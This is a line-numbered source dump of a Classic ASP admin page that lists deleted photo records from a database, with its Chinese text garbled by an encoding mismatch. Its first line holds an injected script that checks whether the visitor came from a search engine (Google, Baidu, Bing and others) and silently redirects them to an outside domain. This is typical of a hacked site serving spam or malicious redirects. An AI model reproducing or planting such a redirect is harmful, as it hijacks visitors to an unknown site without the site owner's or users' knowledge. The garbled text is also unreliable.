d:\wwwroot\wuchunhua\ͨѶ¼\admin\sysphoto.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!-- #include file="chk.asp" -->
002:
<!-- #include file="conn.asp" -->
003:
<%
if Session("admin2")<>"admin" Then
004:
Response.Write "ÄúûÓÐȨÏÞ·ÃÎʸÃÒ³£¡"
005:
Response.end
006:
End if
%
>
007:
<HTML><HEAD><TITLE>ºǫ́¹ÜÀíÊ×Ò³</TITLE>
008:
<SCRIPT language=JavaScript>
009:
function CheckSel(Voption,Value)
010:
{
011:
var obj = document.getElementById(Voption);
012:
for (i=0;i<obj.length;i++){
013:
if (obj.options[i].value==Value){
014:
obj.options[i].selected=true;
015:
break;
016:
}
017:
}
018:
}
019:
function chang_size(num,objname)
020:
{
021:
var obj=document.getElementById(objname)
022:
if (parseInt(obj.rows)+num>=3) {
023:
obj.rows = parseInt(obj.rows) + num;
024:
}
025:
if (num>0)
026:
{
027:
obj.width="90%";
028:
}
029:
}
030:
</SCRIPT>
031:
032:
<STYLE type=text/css>#showpage {
033:
CLEAR: both; WIDTH: 100%; TEXT-ALIGN: center
034:
}
035:
</STYLE>
036:
037:
<META http-equiv=Content-Type content="text/html; charset=gb2312"><LINK
038:
href="images/admin_STYLE.css" rel=stylesheet>
039:
<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
040:
<BODY class=bgcolor leftMargin=2 topMargin=0 marginheight="0"
041:
marginwidth="0"><BR>
042:
<TABLE class=border cellSpacing=1 cellPadding=2 width="706" align=center
043:
border=0>
044:
<TBODY>
045:
<TR align=middle>
046:
<TD class=topbg width=698 height=25>
047:
<DIV align=left><font size="3"><b>ÒÑɾÕÕÆ¬ÐÅÏ¢ </b></font><font size="2">
048:
<a href="sysphoto_delall.asp">Çå¿Õ[sysphoto]±íÖеÄËùÓÐÐÅÏ¢</a>
049:
<font color="#FF0000">£¨Çëͨ¹ýFTPÁ¬½Óºóɾ³ýÁËÏÂÁÐÎļþºóÔÚÇå¿Õ£©</font></font></DIV></TD></TR></TBODY></TABLE><BR>
050:
<TABLE class=border cellSpacing=1 cellPadding=2 width="704" align=center
051:
bgColor=#ffffff border=0 height="45">
052:
<TBODY>
053:
054:
<TR>
055:
<TD class=tdbg height=22 width="350" align="center">
056:
<p align="center">ÎļþÃû</TD>
057:
<TD class=tdbg height=22 width="351" align="center">
058:
ɾ³ýʱ¼ä</TD></TR>
059:
<%
060:
set rs=server.createobject("adodb.recordset")
061:
rs.Open "Select * from [sysphoto]",conn,1,1
062:
If rs.Bof Or rs.Eof then
063:
Response.Write "ûÓÐÊý¾Ý£¡"
064:
Else
065:
While not rs.eof
066:
%
>
067:
068:
069:
<tr>
070:
<TD class=tdbg height=23 width="350" align="center">
<%
=rs("name")
%
>
071:
¡¡</TD>
072:
<TD class=tdbg height=23 width="351" align="center">
<%
=rs("time")
%
>
073:
¡¡</TD>
074:
</tr>
075:
<%
076:
rs.MoveNext
077:
Wend
078:
End If
079:
rs.Close
080:
Set rs=nothing
081:
%
>
082:
083:
</TBODY></TABLE></BODY></HTML>
084:
085: